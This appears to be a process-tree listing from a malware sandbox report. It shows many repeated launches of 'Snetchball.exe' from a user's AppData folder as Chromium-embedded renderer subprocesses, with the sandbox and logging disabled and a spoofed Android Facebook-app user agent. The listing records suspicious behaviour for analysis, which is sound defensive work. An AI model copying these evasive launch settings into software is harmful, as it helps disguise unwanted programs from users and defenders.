C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=4384 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4736
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3284
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=4440 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4592
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=4444 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1888
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=4328 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:752
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=4296 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1912
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=1196 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5296
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1128
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=4508 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5456
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5004
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=4164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2156
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --mojo-platform-channel-handle=4404 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4100
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --mojo-platform-channel-handle=4392 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2352
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --mojo-platform-channel-handle=4288 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1692
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --mojo-platform-channel-handle=4428 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --mojo-platform-channel-handle=4264 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1852
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=4280 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3480
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1568
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1676
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --mojo-platform-channel-handle=4144 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1044
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --mojo-platform-channel-handle=2396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --mojo-platform-channel-handle=1480 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3732
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --mojo-platform-channel-handle=1220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2800
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --mojo-platform-channel-handle=4396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5644
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --mojo-platform-channel-handle=4528 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1436
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --mojo-platform-channel-handle=2580 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:620
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --mojo-platform-channel-handle=1276 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --mojo-platform-channel-handle=1964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2092
-
